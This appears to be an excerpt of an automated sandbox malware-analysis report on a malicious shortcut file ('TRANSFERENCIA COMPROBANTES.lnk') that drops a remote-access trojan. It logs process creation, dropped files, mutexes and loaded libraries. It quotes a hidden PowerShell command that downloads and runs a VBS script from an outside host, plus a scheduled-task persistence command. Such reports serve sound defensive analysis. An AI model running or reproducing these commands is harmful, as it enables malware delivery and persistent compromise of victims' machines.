                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0298401025_2_02984010
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0298365125_2_02983651
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0298E71F25_2_0298E71F
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0298445825_2_02984458
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0298AA5825_2_0298AA58
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_02981B9125_2_02981B91
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0298D89A25_2_0298D89A
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0298082825_2_02980828
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0298EEE725_2_0298EEE7
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_02985C3825_2_02985C38
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0298BDD825_2_0298BDD8
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0298E2EA25_2_0298E2EA
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_029876F925_2_029876F9
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0298444825_2_02984448
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0298AAB025_2_0298AAB0
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0298EBD025_2_0298EBD0
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0298EBE025_2_0298EBE0
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0298F82825_2_0298F828
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0298086925_2_02980869
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0508B5D825_2_0508B5D8
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0508073025_2_05080730
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0508A6E025_2_0508A6E0
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_050821A425_2_050821A4
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_050880E825_2_050880E8
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0508B5C825_2_0508B5C8
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_050894B025_2_050894B0
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0508A6D125_2_0508A6D1
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_050880D825_2_050880D8
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_050820F825_2_050820F8
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0508238B25_2_0508238B
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0508238C25_2_0508238C
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_050822D725_2_050822D7
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_050822EC25_2_050822EC
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_05088D7C25_2_05088D7C
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_05089DC025_2_05089DC0
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_05089DD025_2_05089DD0
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_05084EB025_2_05084EB0
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 26_2_04CB0B6026_2_04CB0B60
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 27_2_02FB0B6027_2_02FB0B60
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 28_2_018C0B6028_2_018C0B60
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_0101401031_2_01014010
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_0101445831_2_01014458
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_0101365B31_2_0101365B
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_0101D86031_2_0101D860
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_0101086931_2_01010869
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_01011B9131_2_01011B91
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_0101AA5731_2_0101AA57
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_0101BDD831_2_0101BDD8
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_01015C3831_2_01015C38
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_0101EEE731_2_0101EEE7
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_0101E2EA31_2_0101E2EA
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_0101444831_2_01014448
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_0101445331_2_01014453
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_0101770331_2_01017703
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_0101E73031_2_0101E730
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_010176F931_2_010176F9
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_0101F82831_2_0101F828
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_0101D89A31_2_0101D89A
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_0101EBD031_2_0101EBD0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_0101EBE031_2_0101EBE0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_0101AAB031_2_0101AAB0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_0755B5D831_2_0755B5D8
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_0755A6D131_2_0755A6D1
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_0755A6E031_2_0755A6E0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_0755B5C831_2_0755B5C8
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_075594B031_2_075594B0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_075594A031_2_075594A0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_0755238C31_2_0755238C
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_075522EC31_2_075522EC
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_075521A431_2_075521A4
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_0755704731_2_07557047
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_0755703B31_2_0755703B
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_075580D831_2_075580D8
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_075580E831_2_075580E8
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_07554EB031_2_07554EB0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_07558D7C31_2_07558D7C
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_07559DD031_2_07559DD0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 31_2_07559DC031_2_07559DC0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 32_2_014D0B6032_2_014D0B60
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 35_2_00EF0B6035_2_00EF0B60
                        Source: .doc.10.drOLE, VBA macro line: Sub Document_Open()
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\cfdhxdzhtfxgh[1].exe 639135EB69333ABA7ECB762072D8BEF1D2DB83E54EDBE627DD223039142B8C91
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe 639135EB69333ABA7ECB762072D8BEF1D2DB83E54EDBE627DD223039142B8C91
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7184 -s 80
                        Source: cfdhxdzhtfxgh[1].exe.11.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: GFKMTE.exe.11.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: GFKMTE.exe.22.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 21.2.GFKMTE.exe.293a5ec.2.raw.unpack, Encryption.csCryptographic APIs: 'CreateDecryptor'
                        Source: 21.2.GFKMTE.exe.26a0000.0.raw.unpack, -----------------------------------------.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 25.2.GFKMTE.exe.29ba2dc.0.raw.unpack, Encryption.csCryptographic APIs: 'CreateDecryptor'
                        Source: classification engineClassification label: mal100.troj.expl.evad.winLNK@35/244@2/4
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\pafdfgz.vbsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMutant created: NULL
                        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7184
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMutant created: \Sessions\1\BaseNamedObjects\Xeno_rat_nd8912d-admin
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e4pek3x4.alp.ps1Jump to behavior
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                        Source: TRANSFERENCIA COMPROBANTES.lnkReversingLabs: Detection: 39%
                        Source: TRANSFERENCIA COMPROBANTES.lnkVirustotal: Detection: 44%
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs"
                        Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe"
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe "C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe"
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp80A6.tmp" /F
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7184 -s 80
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs" Jump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe "C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe"
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp80A6.tmp" /F
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
